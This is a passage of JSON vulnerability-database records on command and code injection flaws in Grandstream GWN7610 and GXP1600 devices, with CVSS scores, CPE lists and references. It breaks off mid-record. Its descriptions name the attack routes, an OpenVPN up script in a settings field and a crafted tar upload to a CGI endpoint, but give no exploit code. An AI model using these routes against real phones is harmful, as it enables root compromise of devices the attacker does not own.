"db": "JVNDB",
"id": "JVNDB-2019-003019"
},
{
"date": "2023-03-01T14:49:35.213000",
"db": "NVD",
"id": "CVE-2019-10658"
},
{
"date": "2020-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1223"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1223"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GWN7610 Command injection vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003019"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1223"
}
],
"trust": 0.6
}
}
VAR-202004-2006
Vulnerability from variot - Updated: 2023-12-18 13:01Grandstream GXP1600 series firmware 1.0.4.152 and below is vulnerable to authenticated remote command execution when an attacker adds an OpenVPN up script to the phone's VPN settings via the "Additional Settings" field in the web interface. When the VPN's connection is established, the user defined script is executed with root privileges. Grandstream GXP1600 A code injection vulnerability exists in the series firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream GXP1600 is an IP telephony product from American company Grandstream. An attacker can use the ‘Additional Settings’ field to exploit this vulnerability to add any OpenVPN configuration settings to the configuration file and execute code with root privileges
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-2006",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gxp1625",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1630",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1620",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1610",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1628",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1615",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1610",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1615",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1620",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1625",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1628",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1630",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1600",
"scope": "lte",
"trust": 0.6,
"vendor": "grandstream",
"version": "\u003c=1.0.4.152"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25973"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003968"
},
{
"db": "NVD",
"id": "CVE-2020-5739"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1610_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.4.152",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1610:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1615_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.4.152",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1615:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1620_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.4.152",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1620:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1625_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.4.152",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1625:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1628_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.4.152",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1628:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1630_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.4.152",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1630:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5739"
}
]
},
"cve": "CVE-2020-5739",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2020-003968",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2020-25973",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-003968",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-5739",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-003968",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-25973",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-903",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25973"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003968"
},
{
"db": "NVD",
"id": "CVE-2020-5739"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-903"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GXP1600 series firmware 1.0.4.152 and below is vulnerable to authenticated remote command execution when an attacker adds an OpenVPN up script to the phone\u0027s VPN settings via the \"Additional Settings\" field in the web interface. When the VPN\u0027s connection is established, the user defined script is executed with root privileges. Grandstream GXP1600 A code injection vulnerability exists in the series firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream GXP1600 is an IP telephony product from American company Grandstream. An attacker can use the \u2018Additional Settings\u2019 field to exploit this vulnerability to add any OpenVPN configuration settings to the configuration file and execute code with root privileges",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5739"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003968"
},
{
"db": "CNVD",
"id": "CNVD-2020-25973"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-5739",
"trust": 3.0
},
{
"db": "TENABLE",
"id": "TRA-2020-22",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003968",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-25973",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-903",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25973"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003968"
},
{
"db": "NVD",
"id": "CVE-2020-5739"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-903"
}
]
},
"id": "VAR-202004-2006",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25973"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25973"
}
]
},
"last_update_date": "2023-12-18T13:01:46.111000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003968"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-94",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003968"
},
{
"db": "NVD",
"id": "CVE-2020-5739"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.tenable.com/security/research/tra-2020-22"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5739"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5739"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003968"
},
{
"db": "NVD",
"id": "CVE-2020-5739"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-903"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-25973"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003968"
},
{
"db": "NVD",
"id": "CVE-2020-5739"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-903"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-25973"
},
{
"date": "2020-04-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003968"
},
{
"date": "2020-04-14T14:15:12.007000",
"db": "NVD",
"id": "CVE-2020-5739"
},
{
"date": "2020-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-903"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-25973"
},
{
"date": "2020-04-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003968"
},
{
"date": "2020-04-14T18:14:42.517000",
"db": "NVD",
"id": "CVE-2020-5739"
},
{
"date": "2021-07-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-903"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-903"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GXP1600 code injection vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25973"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-903"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-903"
}
],
"trust": 0.6
}
}
VAR-202004-2005
Vulnerability from variot - Updated: 2023-12-18 13:01Grandstream GXP1600 series firmware 1.0.4.152 and below is vulnerable to authenticated remote command execution when an attacker uploads a specially crafted tar file to the HTTP /cgi-bin/upload_vpntar interface. Grandstream GXP1600 A link interpretation vulnerability exists in the series firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream GXP1600 is an IP telephony product from American company Grandstream.
There is a post link vulnerability in the Grandstream GXP1600 series using firmware version 1.0.4.152 and earlier
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-2005",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gxp1625",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1630",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1620",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1610",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1628",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1615",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1610",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1615",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1620",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1625",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1628",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1630",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.4.152"
},
{
"model": "gxp1600",
"scope": "lte",
"trust": 0.6,
"vendor": "grandstream",
"version": "\u003c=1.0.4.152"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25972"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003967"
},
{
"db": "NVD",
"id": "CVE-2020-5738"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1610_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.4.152",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1610:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1615_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.4.152",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1615:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1620_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.4.152",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1620:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1625_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.4.152",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1625:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1628_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.4.152",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1628:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1630_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.4.152",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1630:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5738"
}
]
},
"cve": "CVE-2020-5738",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2020-003967",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2020-25972",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
